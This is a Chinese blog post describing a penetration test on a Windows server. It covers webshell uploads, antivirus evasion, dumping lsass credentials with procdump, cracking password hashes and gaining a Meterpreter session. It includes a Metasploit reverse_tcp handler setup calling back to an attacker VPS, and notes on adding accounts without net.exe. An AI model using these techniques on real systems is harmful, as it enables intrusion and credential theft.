绕过不能执行大部分系统命令和微软杀毒

VSole2022-07-17 06:12:18

公司项目,全程打码,已经拿下webshell,提权。

看不到任何系统里面的文件,执行系统

怀疑是webshell的问题,随便传了一个txt可以访问,直接传一个大马。  

其实传上去的很多大马或者小马都是这个界面,可以访问但是根本是连接不上的。

最后找了很早之前的神盾加密的Php马,才能正常访问。而且有的马还会被杀。

不知道为啥看不了conf里面的db.php文件。然后翻了下有个Mysql目录可以udf提权。 

找到Mysql里面的user.myd文件,拼接hash值(40位),可以正常解密。虽然花费了1块钱。  

然后利用网上的udf.php很多都不行。只能放弃,考虑别的方法。  

无意中发现,php禁止的其实都属于php函数,但是asp和aspx跟php是不同的。

传asp、 aspx大马访问都是500,传了一个asp的冰蝎。。算是可以了。

可以正常执行命令,感觉还算是有点戏。接着执行其他命令。。。我傻了。。。

我真的还是很佩服管理员的,这也是很秀了,进程、端口、所属权限、wmic、powershell都不能执行。。  

直接nmap扫下吧。  

之前在服务器也看到了tomcat目录  

其实之前看到这个目录了,但是看端口被注释了,眼花看错了。。。

也是执行不了,但是tomcat做降权应该还是比较少的。生成一个cs马上去直接被杀。

然后穿了一个procdump64.exe直接导出一个lsass.dmp文件,但是本地mimikatz导入

出了一点问题。既然能执行exe程序,就还能玩。

传个net.exe net1.exe等试试。  

可惜并不行,导出注册表啥的肯定也不行,因为reg是不能执行的。有杀软很多还不传。只能bypass这个杀软,虽然不知道是啥。 

生成一个hex文件,然后把gsl64.exe传上去。  


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost `vps ip`set lport 6666
exploit ‐j

正常上线。首先肯定是先看看进程和端口信息

结合前面的进程发现mstsc的远程端口改为了9833,也就是3389的反转。  因为2012系统之后需要修改注册表,这台正好。。。没有修改。只能抓取Hash破解。

用户还是有几个,正好都去破解下,很不幸。。都解不开。

破解hash网站
https://www.objectif‐securite.ch/ophcrack
https://www.cmd5.com/

所以只能添加个系统账号登录进去,但是net和net1都不能用,知道有一个不依赖net和net1来添加用户而是用api加用户,所有我去电脑翻了下,找到一个。  

传上去试试。

在meterpreter执行下hashdump看看有没有添加成功。

还是有点麻烦的。。。再见。

本作品采用《CC 协议》,转载必须注明作者和本文链接
公司项目,全程打码,已经拿下webshell,提权。最后找了很早之前的神盾加密的Php马,才能正常访问。找到Mysql里面的user.myd文件,拼接hash值(40位),可以正常解密。无意中发现,php禁止的其实都属于php函数,但是aspaspx跟php是不同的。
用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留。查看下pid所对应的进程文件路径,
这里建议doc文档,图片可以贴的详细一些。爆破完好了,一样的6。想给它一个清晰完整的定义其实是非常困难的。
一、漏洞挖掘的前期–信息收集 虽然是前期,但是却是我认为最重要的一部分; 很多人挖洞的时候说不知道如何入手,其实挖洞就是信息收集+常规owasp top 10+逻辑漏洞(重要的可能就是思路猥琐一点),这些漏洞的测试方法本身不是特别复杂,一般混迹在安全圈子的人都能复现漏洞。接下来我就着重说一下我在信息收集方面的心得。
涉及系统命令调用执行的函数在接收用户的参数输入时未做检查过滤,或者攻击者可以通过编码及其他替换手段绕过安全限制注入命令串,导致执行攻击指定的命令。
SQL注入速查表
2022-07-29 09:22:37
现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLEPostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。
⽹上整理的⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。
VSole
网络安全专家